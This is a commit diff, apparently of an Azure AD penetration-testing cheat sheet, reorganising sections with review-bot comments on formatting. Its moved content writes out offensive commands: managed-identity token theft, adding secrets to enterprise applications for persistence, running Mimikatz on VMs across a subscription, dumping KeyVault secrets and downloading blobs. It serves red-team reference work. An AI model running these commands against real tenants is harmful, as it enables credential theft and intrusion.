Devices and Services
parent
f7bd9bb527
commit
d3b66447cd
|
@ -14,14 +14,6 @@
|
||||||
* [Stealing Tokens](#stealing-tokens)
|
* [Stealing Tokens](#stealing-tokens)
|
||||||
* [Stealing tokens from az cli](#stealing-tokens-from-az-cli)
|
* [Stealing tokens from az cli](#stealing-tokens-from-az-cli)
|
||||||
* [Stealing tokens from az powershell](#stealing-tokens-from-az-powershell)
|
* [Stealing tokens from az powershell](#stealing-tokens-from-az-powershell)
|
||||||
* [Add Credentials to All Enterprise Applications](#add-credentials-to-all-enterprise-applications)
|
|
||||||
* [Spawn SSH for Azure Web App](#spawn-ssh-for-azure-web-app)
|
|
||||||
* [Azure Storage Blob](#azure-storage-blob)
|
|
||||||
* [Enumerate blobs](#enumerate-blobs)
|
|
||||||
* [SAS URL](#sas-url)
|
|
||||||
* [List and download blobs](#list-and-download-blobs)
|
|
||||||
* [Virtual Machine RunCommand](#virtual-machine-runcommand)
|
|
||||||
* [KeyVault Secrets](#keyvault-secrets)
|
|
||||||
* [Pass The Certificate](#pass--the-certificate)
|
* [Pass The Certificate](#pass--the-certificate)
|
||||||
* [Pass The PRT](#pass-the-prt)
|
* [Pass The PRT](#pass-the-prt)
|
||||||
* [Intunes Administration](#intunes-administration)
|
* [Intunes Administration](#intunes-administration)
|
||||||
|
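Review bot: the TOC entries removed here (Add Credentials, Spawn SSH, Azure Storage Blob, Enumerate blobs, SAS URL, List and download blobs, Virtual Machine RunCommand, KeyVault Secrets) point at sections that this commit moves into other files, but nothing in this hunk replaces them with a link, so a reader of the README loses the trail; consider a short "See also" list pointing at the Persistence and Services pages where those sections now live.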
@ -188,81 +180,6 @@
|
||||||
```
|
```
|
||||||
* [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API
|
* [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API
|
||||||
|
|
||||||
|
|
||||||
## Enumeration
|
|
||||||
|
|
||||||
## Enumeration methodology
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# Check Azure Joined
|
|
||||||
PS> dsregcmd.exe /status
|
|
||||||
+----------------------------------------------------------------------+
|
|
||||||
| Device State |
|
|
||||||
+----------------------------------------------------------------------+
|
|
||||||
AzureAdJoined : YES
|
|
||||||
EnterpriseJoined : NO
|
|
||||||
DomainJoined : NO
|
|
||||||
Device Name : jumpvm
|
|
||||||
|
|
||||||
# Enumerate resources
|
|
||||||
PS Az> Get-AzResource
|
|
||||||
|
|
||||||
# Enumerate role assignments
|
|
||||||
PS Az> Get-AzRoleAssignment -Scope /subscriptions/<SUBSCRIPTION-ID>/resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/<VM-NAME>`
|
|
||||||
|
|
||||||
# Get info on a role
|
|
||||||
PS Az> Get-AzRoleDefinition -Name "Virtual Machine Command Executor"
|
|
||||||
|
|
||||||
# Get info user
|
|
||||||
PS AzureAD> Get-AzureADUser -ObjectId <ID>
|
|
||||||
PS AzureAD> Get-AzureADUser -ObjectId test@<TENANT NAME>.onmicrosoft.com | fl *
|
|
||||||
|
|
||||||
# List all groups
|
|
||||||
PS AzureAD> Get-AzureADGroup -All $true
|
|
||||||
|
|
||||||
# Get members of a group
|
|
||||||
PS Az> Get-AzADGroup -DisplayName '<GROUP-NAME>'
|
|
||||||
PS Az> Get-AzADGroupMember -GroupDisplayName '<GROUP-NAME>' | select UserPrincipalName
|
|
||||||
|
|
||||||
# Get Azure AD information
|
|
||||||
PS> Import-Module C:\Tools\AADInternals\AADInternals.psd1
|
|
||||||
PS AADInternals> Get-AADIntLoginInformation -UserName admin@<TENANT NAME>.onmicrosoft.com
|
|
||||||
PS AADInternals> Get-AADIntTenantID -Domain <TENANT NAME>.onmicrosoft.com # Get Tenant ID
|
|
||||||
PS AADInternals> Invoke-AADIntReconAsOutsider -DomainName <DOMAIN> # Get all the information
|
|
||||||
|
|
||||||
# Check if there is a user logged-in to az cli
|
|
||||||
PS> az ad signed-in-user show
|
|
||||||
|
|
||||||
# Check AppID Alternative Names/Display Name
|
|
||||||
PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<APP-ID>"} | fl
|
|
||||||
|
|
||||||
|
|
||||||
# Get all application objects registered using the current tenant
|
|
||||||
PS AzureAD> Get-AzureADApplication -All $true
|
|
||||||
|
|
||||||
# Get all details about an application
|
|
||||||
PS AzureAD> Get-AzureADApplication -ObjectId <ID> | fl *
|
|
||||||
|
|
||||||
# List all VM's the user has access to
|
|
||||||
PS Az> Get-AzVM
|
|
||||||
PS Az> Get-AzVM | fl
|
|
||||||
|
|
||||||
# Get all function apps
|
|
||||||
PS Az> Get-AzFunctionApp
|
|
||||||
|
|
||||||
# Get all webapps
|
|
||||||
PS Az> Get-AzWebApp
|
|
||||||
PS Az> Get-AzWebApp | select-object Name, Type, Hostnames
|
|
||||||
|
|
||||||
# List all storage accounts
|
|
||||||
PS Az> Get-AzStorageAccount
|
|
||||||
PS Az> Get-AzStorageAccount | fl
|
|
||||||
|
|
||||||
# List all keyvaults
|
|
||||||
PS Az> Get-AzKeyVault
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
## Token from Managed Identity
|
## Token from Managed Identity
|
||||||
|
|
||||||
> **MSI_ENDPOINT** is an alias for **IDENTITY_ENDPOINT**, and **MSI_SECRET** is an alias for **IDENTITY_HEADER**.
|
> **MSI_ENDPOINT** is an alias for **IDENTITY_ENDPOINT**, and **MSI_SECRET** is an alias for **IDENTITY_HEADER**.
|
||||||
|
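Review bot: several commands deleted in this hunk do not reappear in the Enumeration.md hunk further down: `Get-AzRoleDefinition -Name "Virtual Machine Command Executor"`, `Get-AzureADUser -ObjectId <ID>`, `Get-AzureADApplication -ObjectId <ID> | fl *`, `az ad signed-in-user show` and `Get-AzWebApp | select-object Name, Type, Hostnames`. If the drop is intentional, fine; otherwise carry them over. One side effect worth keeping: the stray trailing backtick on the `Get-AzRoleAssignment -Scope ...` line is gone in the moved copy.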
@ -430,123 +347,6 @@ az account get-access-token --resource-type aad-graph
|
||||||
* Users can save tokens using `Save-AzContext`
|
* Users can save tokens using `Save-AzContext`
|
||||||
|
|
||||||
|
|
||||||
## Add credentials to all Enterprise Applications
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# Add secrets
|
|
||||||
PS > . C:\Tools\Add-AzADAppSecret.ps1
|
|
||||||
PS > Add-AzADAppSecret -GraphToken $graphtoken -Verbose
|
|
||||||
|
|
||||||
# Use secrets to authenticate as Service Principal
|
|
||||||
PS > $password = ConvertTo-SecureString '<SECRET/PASSWORD>' -AsPlainText -Force
|
|
||||||
PS > $creds = New-Object System.Management.Automation.PSCredential('<AppID>', $password)
|
|
||||||
PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '<TenantID>'
|
|
||||||
```
|
|
||||||
|
|
||||||
## Spawn SSH for Azure Web App
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
az webapp create-remote-connection --subscription <SUBSCRIPTION-ID> --resource-group <RG-NAME> -n <APP-SERVICE-NAME>
|
|
||||||
```
|
|
||||||
|
|
||||||
## Azure Storage Blob
|
|
||||||
|
|
||||||
* Blobs - `*.blob.core.windows.net`
|
|
||||||
* File Services - `*.file.core.windows.net`
|
|
||||||
* Data Tables - `*.table.core.windows.net`
|
|
||||||
* Queues - `*.queue.core.windows.net`
|
|
||||||
|
|
||||||
### Enumerate blobs
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
PS > . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureBlobs.ps1
|
|
||||||
PS > Invoke-EnumerateAzureBlobs -Base <SHORT DOMAIN> -OutputFile azureblobs.txt
|
|
||||||
Found Storage Account - testsecure.blob.core.windows.net
|
|
||||||
Found Storage Account - securetest.blob.core.windows.net
|
|
||||||
Found Storage Account - securedata.blob.core.windows.net
|
|
||||||
Found Storage Account - securefiles.blob.core.windows.net
|
|
||||||
```
|
|
||||||
|
|
||||||
### SAS URL
|
|
||||||
|
|
||||||
* Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/)
|
|
||||||
* Click on **Open Connect Dialog** in the left menu.
|
|
||||||
* Select **Blob container**.
|
|
||||||
* On the **Select Authentication Method** page
|
|
||||||
* Select **Shared access signature (SAS)** and click on Next
|
|
||||||
* Copy the URL in **Blob container SAS URL** field.
|
|
||||||
|
|
||||||
:warning: You can also use `subscription`(username/password) to access storage resources such as blobs and files.
|
|
||||||
|
|
||||||
### List and download blobs
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
PS Az> Get-AzResource
|
|
||||||
PS Az> Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>
|
|
||||||
PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context
|
|
||||||
PS Az> Get-AzStorageBlobContent -Container <NAME> -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context -Blob
|
|
||||||
```
|
|
||||||
|
|
||||||
## Virtual Machine RunCommand
|
|
||||||
|
|
||||||
Requirements:
|
|
||||||
* `Microsoft.Compute/virtualMachines/runCommand/action`
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# Get Public IP of VM : query the network interface
|
|
||||||
PS AzureAD> Get-AzVM -Name <RESOURCE> -ResourceGroupName <RG-NAME> | select -ExpandProperty NetworkProfile
|
|
||||||
PS AzureAD> Get-AzNetworkInterface -Name <RESOURCE368>
|
|
||||||
PS AzureAD> Get-AzPublicIpAddress -Name <RESOURCEIP>
|
|
||||||
|
|
||||||
# Execute Powershell script on the VM
|
|
||||||
PS AzureAD> Invoke-AzVMRunCommand -VMName <RESOURCE> -ResourceGroupName <RG-NAME> -CommandId 'RunPowerShellScript' -ScriptPath 'C:\Tools\adduser.ps1' -Verbose
|
|
||||||
|
|
||||||
# Connect via WinRM
|
|
||||||
PS C:\Tools> $password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
|
|
||||||
PS C:\Tools> $creds = New-Object System.Management.Automation.PSCredential('username', $Password)
|
|
||||||
PS C:\Tools> $sess = New-PSSession -ComputerName <IP> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
|
|
||||||
PS C:\Tools> Enter-PSSession $sess
|
|
||||||
```
|
|
||||||
|
|
||||||
> Allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as NT Authority\System
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# List available VMs
|
|
||||||
PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name
|
|
||||||
ResourceGroupName Name
|
|
||||||
----------------- ----
|
|
||||||
TESTRESOURCES Remote-Test
|
|
||||||
|
|
||||||
# Execute Powershell script on the VM
|
|
||||||
PS C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
|
|
||||||
```
|
|
||||||
|
|
||||||
Against the whole subscription using MicroBurst.ps1
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
Import-module MicroBurst.psm1
|
|
||||||
Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
## KeyVault Secrets
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# keyvault access token
|
|
||||||
curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
|
|
||||||
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
|
|
||||||
|
|
||||||
# connect
|
|
||||||
PS> $token = 'eyJ0..'
|
|
||||||
PS> $keyvaulttoken = 'eyJ0..'
|
|
||||||
PS Az> Connect-AzAccount -AccessToken $token -AccountId 2e91a4fea0f2-46ee-8214-fa2ff6aa9abc -KeyVaultAccessToken $keyvaulttoken
|
|
||||||
|
|
||||||
# query the vault and the secrets
|
|
||||||
PS Az> Get-AzKeyVault
|
|
||||||
PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault
|
|
||||||
PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault -Name Reader -AsPlainText
|
|
||||||
```
|
|
||||||
|
|
||||||
## Pass The PRT
|
## Pass The PRT
|
||||||
|
|
||||||
> MimiKatz (version 2.2.0 and above) can be used to attack (hybrid) Azure AD joined machines for lateral movement attacks via the Primary Refresh Token (PRT) which is used for Azure AD SSO (single sign-on).
|
> MimiKatz (version 2.2.0 and above) can be used to attack (hybrid) Azure AD joined machines for lateral movement attacks via the Primary Refresh Token (PRT) which is used for Azure AD SSO (single sign-on).
|
||||||
|
|
|
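Review bot: the removed KeyVault block carries a concrete value in `Connect-AzAccount -AccessToken $token -AccountId 2e91a4fea0f2-46ee-8214-fa2ff6aa9abc` and a lab vault name `ResearchKeyVault`; the copy added to Services.md swaps both for placeholders (`$accid = '2e...bc'`, `<VaultName>`), which is the right call, so check that no other page still quotes the literal id. The `## Azure Storage Blob` endpoint list (blob/file/table/queue) is removed together with its subsections, which is consistent with the move.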
@ -1,5 +1,19 @@
|
||||||
# Azure AD Tokens
|
# Azure AD Tokens
|
||||||
|
|
||||||
|
## Connection
|
||||||
|
|
||||||
|
After a successfull authentication, you will get an access token.
|
||||||
|
|
||||||
|
* az cli
|
||||||
|
* Azure AD Powershell
|
||||||
|
* Az Powershell
|
||||||
|
* External HTTP API
|
||||||
|
* Internal HTTP API
|
||||||
|
```ps1
|
||||||
|
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
|
||||||
|
curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Access Token
|
## Access Token
|
||||||
|
|
||||||
|
|
|
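Review bot: the new `## Connection` block is fenced as `ps1` but its two lines are `curl ... -H secret:$IDENTITY_HEADER`, which only work with a real curl binary; in Windows PowerShell `curl` is an alias for `Invoke-WebRequest`, which does not accept `-H`, so either write `curl.exe`, use `Invoke-RestMethod -Headers @{secret=$env:IDENTITY_HEADER}`, or tag the fence as bash. Also `successfull` should be `successful`, and the five bullets (az cli, Azure AD Powershell, Az Powershell, External HTTP API, Internal HTTP API) list options without saying that the code block only covers the last one.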
@ -9,10 +9,21 @@
|
||||||
## Users
|
## Users
|
||||||
|
|
||||||
* List users: `Get-AzureADUser -All $true`
|
* List users: `Get-AzureADUser -All $true`
|
||||||
* Enumerate groups: `Get-AzureADGroup -All $true`
|
* Enumerate groups
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
# List groups
|
||||||
|
Get-AzureADGroup -All $true
|
||||||
|
|
||||||
|
# Get members of a group
|
||||||
|
Get-AzADGroup -DisplayName '<GROUP-NAME>'
|
||||||
|
Get-AzADGroupMember -GroupDisplayName '<GROUP-NAME>' | select UserPrincipalName
|
||||||
|
```
|
||||||
|
|
||||||
* Enumerate roles: `Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember`
|
* Enumerate roles: `Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember`
|
||||||
* List roles: `Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName`
|
* List roles: `Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName`
|
||||||
* Add user to a group
|
* Add user to a group
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
$groupid = "<group-id>"
|
$groupid = "<group-id>"
|
||||||
$targetmember = "<user-id>"
|
$targetmember = "<user-id>"
|
||||||
|
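Review bot: the `Enumerate groups` bullet is now followed by a fenced block at column 0, which splits the bullet list in two (`Enumerate roles` and `List roles` start a new list); indent the fence under the bullet or move it after the list. The block also mixes modules without saying so: `Get-AzureADGroup` comes from AzureAD, while `Get-AzADGroup` / `Get-AzADGroupMember` come from Az; a comment per command naming the module would save the reader a failed call.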
@ -49,6 +60,20 @@ Get-AzureADUserRegisteredDevice -ObjectId $user.ObjectId -All $true
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Device State
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
PS> dsregcmd.exe /status
|
||||||
|
+----------------------------------------------------------------------+
|
||||||
|
| Device State |
|
||||||
|
+----------------------------------------------------------------------+
|
||||||
|
AzureAdJoined : YES
|
||||||
|
EnterpriseJoined : NO
|
||||||
|
DomainJoined : NO
|
||||||
|
Device Name : jumpvm
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
### Join Devices
|
### Join Devices
|
||||||
|
|
||||||
* [Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device)
|
* [Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device)
|
||||||
|
|
|
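Review bot: the new `### Device State` block shows the three join flags (`AzureAdJoined`, `EnterpriseJoined`, `DomainJoined`) but does not say how to read them, and the README text this commit keeps (`(hybrid) Azure AD joined machines` under Pass The PRT) depends on that distinction; a one-line legend above the block would tie the two together. `Device Name : jumpvm` is lab output and could be a placeholder like the other `<...>` values.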
@ -20,16 +20,19 @@
|
||||||
|
|
||||||
* Federation with Azure AD or O365
|
* Federation with Azure AD or O365
|
||||||
```powershell
|
```powershell
|
||||||
|
Get-AADIntLoginInformation -UserName <USER>@<TENANT NAME>.onmicrosoft.com
|
||||||
https://login.microsoftonline.com/getuserrealm.srf?login=<USER>@<DOMAIN>&xml=1
|
https://login.microsoftonline.com/getuserrealm.srf?login=<USER>@<DOMAIN>&xml=1
|
||||||
https://login.microsoftonline.com/getuserrealm.srf?login=root@<TENANT NAME>.onmicrosoft.com&xml=1
|
https://login.microsoftonline.com/getuserrealm.srf?login=root@<TENANT NAME>.onmicrosoft.com&xml=1
|
||||||
```
|
```
|
||||||
* Get the Tenant ID
|
* Get the Tenant ID
|
||||||
```powershell
|
```powershell
|
||||||
|
Get-AADIntTenantID -Domain <TENANT NAME>.onmicrosoft.com
|
||||||
https://login.microsoftonline.com/<DOMAIN>/.well-known/openid-configuration
|
https://login.microsoftonline.com/<DOMAIN>/.well-known/openid-configuration
|
||||||
https://login.microsoftonline.com/<TENANT NAME>.onmicrosoft.com/.well-known/openid-configuration
|
https://login.microsoftonline.com/<TENANT NAME>.onmicrosoft.com/.well-known/openid-configuration
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
### Enumerate Email
|
### Enumerate Email
|
||||||
|
|
||||||
> By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute.
|
> By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute.
|
||||||
|
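Review bot: `Get-AADIntLoginInformation` and `Get-AADIntTenantID` are added without the `Import-Module C:\Tools\AADInternals\AADInternals.psd1` line that the README hunk removes alongside them, so the block no longer says where these cmdlets come from; add the import (or a comment naming AADInternals). Both fences are tagged `powershell` yet also contain bare `https://login.microsoftonline.com/...` URLs, which will not run as written; prefix them with `# ` or wrap them in `Invoke-WebRequest`.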
@ -60,6 +63,7 @@ PS> Invoke-MSOLSpray -UserList C:\Tools\validemails.txt -Password <PASSWORD> -Ve
|
||||||
Extract openly available information for the given tenant: [aadinternals.com/osint](https://aadinternals.com/osint/)
|
Extract openly available information for the given tenant: [aadinternals.com/osint](https://aadinternals.com/osint/)
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
|
Invoke-AADIntReconAsOutsider -DomainName <DOMAIN>
|
||||||
Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table
|
Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table
|
||||||
Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table
|
Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table
|
||||||
```
|
```
|
||||||
|
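Review bot: the added line uses `-DomainName <DOMAIN>` while the two existing lines below it use `-Domain "company.com"` for the same parameter, and the first two lines do the same thing; keep one spelling (the full `-DomainName`) and drop the duplicate so the block does not read as two different switches.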
@ -80,13 +84,33 @@ Subdomain Service
|
||||||
|
|
||||||
* Using Az Powershell module
|
* Using Az Powershell module
|
||||||
```powershell
|
```powershell
|
||||||
|
# Enumerate resources
|
||||||
PS Az> Get-AzResource
|
PS Az> Get-AzResource
|
||||||
PS Az> Get-AzVM | fl
|
|
||||||
|
# List all VM's the user has access to
|
||||||
|
PS Az> Get-AzVM
|
||||||
|
|
||||||
|
# Get all webapps
|
||||||
PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
|
PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
|
||||||
|
|
||||||
|
# Get all function apps
|
||||||
PS Az> Get-AzFunctionApp
|
PS Az> Get-AzFunctionApp
|
||||||
PS Az> Get-AzStorageAccount | fl
|
|
||||||
|
# List all storage accounts
|
||||||
|
PS Az> Get-AzStorageAccount
|
||||||
|
|
||||||
|
# List all keyvaults
|
||||||
PS Az> Get-AzKeyVault
|
PS Az> Get-AzKeyVault
|
||||||
|
|
||||||
|
# Get all application objects registered using the current tenant
|
||||||
|
PS AzureAD> Get-AzureADApplication -All $true
|
||||||
|
|
||||||
|
# Enumerate role assignments
|
||||||
|
PS Az> Get-AzRoleAssignment -Scope /subscriptions/<SUBSCRIPTION-ID>/resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/<VM-NAME>
|
||||||
PS Az> Get-AzRoleAssignment -SignInName test@<TENANT NAME>.onmicrosoft.com
|
PS Az> Get-AzRoleAssignment -SignInName test@<TENANT NAME>.onmicrosoft.com
|
||||||
|
|
||||||
|
# Check AppID Alternative Names/Display Name
|
||||||
|
PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<APP-ID>"} | fl
|
||||||
```
|
```
|
||||||
|
|
||||||
* Using az cli
|
* Using az cli
|
||||||
|
|
|
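Review bot: `Get-AzVM | fl` and `Get-AzStorageAccount | fl` are deleted rather than moved (the README hunk above deletes its copies too), so the `fl` forms that show all properties are gone from both files; if that is intended, fine, otherwise keep them under the new comments. The bullet says `Using Az Powershell module`, but `Get-AzureADApplication -All $true` and `Get-AzureADServicePrincipal -All $True` (prompt `PS AzureAD>`) need the AzureAD module; move them to an AzureAD bullet or note the module switch.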
@ -0,0 +1,16 @@
|
||||||
|
# Azure Persistence
|
||||||
|
|
||||||
|
## Add secrets to application
|
||||||
|
|
||||||
|
* Add secrets with [lutzenfried/OffensiveCloud/Add-AzADAppSecret.ps1](https://github.com/lutzenfried/OffensiveCloud/blob/main/Azure/Tools/Add-AzADAppSecret.ps1)
|
||||||
|
```powershell
|
||||||
|
PS > . C:\Tools\Add-AzADAppSecret.ps1
|
||||||
|
PS > Add-AzADAppSecret -GraphToken $graphtoken -Verbose
|
||||||
|
```
|
||||||
|
|
||||||
|
* Use secrets to authenticate as Service Principal
|
||||||
|
```ps1
|
||||||
|
PS > $password = ConvertTo-SecureString '<SECRET/PASSWORD>' -AsPlainText -Force
|
||||||
|
PS > $creds = New-Object System.Management.Automation.PSCredential('<AppID>', $password)
|
||||||
|
PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '<TenantID>'
|
||||||
|
```
|
|
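Review bot: `Add-AzADAppSecret -GraphToken $graphtoken` relies on a `$graphtoken` variable that this new file never sets or explains; a comment pointing at the Tokens page (or at the `az account get-access-token --resource-type aad-graph` line visible in the README hunk header) would make the section self-contained. The two fences in this file are tagged `powershell` and `ps1` respectively; pick one tag for the repository.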
@ -1,6 +1,52 @@
|
||||||
# Azure Services
|
# Azure Services
|
||||||
|
|
||||||
## Azure Runbook
|
## Virtual Machine
|
||||||
|
|
||||||
|
### RunCommand
|
||||||
|
|
||||||
|
> Allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as `NT Authority\System`
|
||||||
|
|
||||||
|
**Requirements**:
|
||||||
|
* `Microsoft.Compute/virtualMachines/runCommand/action`
|
||||||
|
|
||||||
|
* List available Virtual Machines
|
||||||
|
```powershell
|
||||||
|
PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name
|
||||||
|
ResourceGroupName Name
|
||||||
|
----------------- ----
|
||||||
|
TESTRESOURCES Remote-Test
|
||||||
|
```
|
||||||
|
|
||||||
|
* Get Public IP of VM by querying the network interface
|
||||||
|
```powershell
|
||||||
|
PS AzureAD> Get-AzVM -Name <RESOURCE> -ResourceGroupName <RG-NAME> | select -ExpandProperty NetworkProfile
|
||||||
|
PS AzureAD> Get-AzNetworkInterface -Name <RESOURCE368>
|
||||||
|
PS AzureAD> Get-AzPublicIpAddress -Name <RESOURCEIP>
|
||||||
|
```
|
||||||
|
|
||||||
|
* Execute Powershell script on the VM, like `adduser`
|
||||||
|
```ps1
|
||||||
|
PS AzureAD> Invoke-AzVMRunCommand -VMName <RESOURCE> -ResourceGroupName <RG-NAME> -CommandId 'RunPowerShellScript' -ScriptPath 'C:\Tools\adduser.ps1' -Verbose
|
||||||
|
PS Azure C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
|
||||||
|
```
|
||||||
|
|
||||||
|
* Finally you should be able to connect via WinRM
|
||||||
|
```ps1
|
||||||
|
$password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
|
||||||
|
$creds = New-Object System.Management.Automation.PSCredential('username', $Password)
|
||||||
|
$sess = New-PSSession -ComputerName <IP> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
|
||||||
|
Enter-PSSession $sess
|
||||||
|
```
|
||||||
|
|
||||||
|
Against the whole subscription using `MicroBurst.ps1`
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
Import-module MicroBurst.psm1
|
||||||
|
Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Runbook
|
||||||
|
|
||||||
Runbook must be **SAVED** and **PUBLISHED** before running it.
|
Runbook must be **SAVED** and **PUBLISHED** before running it.
|
||||||
|
|
||||||
|
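Review bot: the `RunCommand` section mixes the deprecated AzureRM module (`Get-AzureRmVM`, `Invoke-AzureRmVMRunCommand`) with Az (`Invoke-AzVMRunCommand`) without saying so, and the `Execute Powershell script` fence shows both cmdlets doing the same job; keep the Az form and mention AzureRM once as legacy. The prompt `PS Azure C:\>` looks like a typo for `PS C:\>`. The closing paragraph says `MicroBurst.ps1` while the command imports `MicroBurst.psm1`; `Import-module` should also be `Import-Module`.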
@ -41,7 +87,7 @@ Runbook must be **SAVED** and **PUBLISHED** before running it.
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Azure Service Principal
|
## Service Principal
|
||||||
|
|
||||||
* Generate a new service principal password/secret
|
* Generate a new service principal password/secret
|
||||||
```ps1
|
```ps1
|
||||||
|
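Review bot: renaming `## Azure Runbook` and `## Azure Service Principal` to `## Runbook` and `## Service Principal` changes their anchors (`#runbook`, `#service-principal`); any TOC or cross-page link still pointing at `#azure-runbook` or `#azure-service-principal` will break, so grep the repository for the old anchors.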
@ -58,6 +104,75 @@ Runbook must be **SAVED** and **PUBLISHED** before running it.
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## KeyVault
|
||||||
|
|
||||||
|
* Keyvault access token
|
||||||
|
```powershell
|
||||||
|
curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
|
||||||
|
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
|
||||||
|
```
|
||||||
|
|
||||||
|
* Connect with the access token
|
||||||
|
```ps1
|
||||||
|
PS> $token = 'eyJ0..'
|
||||||
|
PS> $keyvaulttoken = 'eyJ0..'
|
||||||
|
PS> $accid = '2e...bc'
|
||||||
|
PS Az> Connect-AzAccount -AccessToken $token -AccountId $accid -KeyVaultAccessToken $keyvaulttoken
|
||||||
|
```
|
||||||
|
|
||||||
|
* Query the vault and the secrets
|
||||||
|
```ps1
|
||||||
|
PS Az> Get-AzKeyVault
|
||||||
|
PS Az> Get-AzKeyVaultSecret -VaultName <VaultName>
|
||||||
|
PS Az> Get-AzKeyVaultSecret -VaultName <VaultName> -Name Reader -AsPlainText
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Azure Storage Blob
|
||||||
|
|
||||||
|
* Blobs - `*.blob.core.windows.net`
|
||||||
|
* File Services - `*.file.core.windows.net`
|
||||||
|
* Data Tables - `*.table.core.windows.net`
|
||||||
|
* Queues - `*.queue.core.windows.net`
|
||||||
|
|
||||||
|
### Enumerate blobs
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
PS > . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureBlobs.ps1
|
||||||
|
PS > Invoke-EnumerateAzureBlobs -Base <SHORT DOMAIN> -OutputFile azureblobs.txt
|
||||||
|
Found Storage Account - redacted.blob.core.windows.net
|
||||||
|
```
|
||||||
|
|
||||||
|
### List and download blobs
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
PS Az> Get-AzResource
|
||||||
|
PS Az> Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>
|
||||||
|
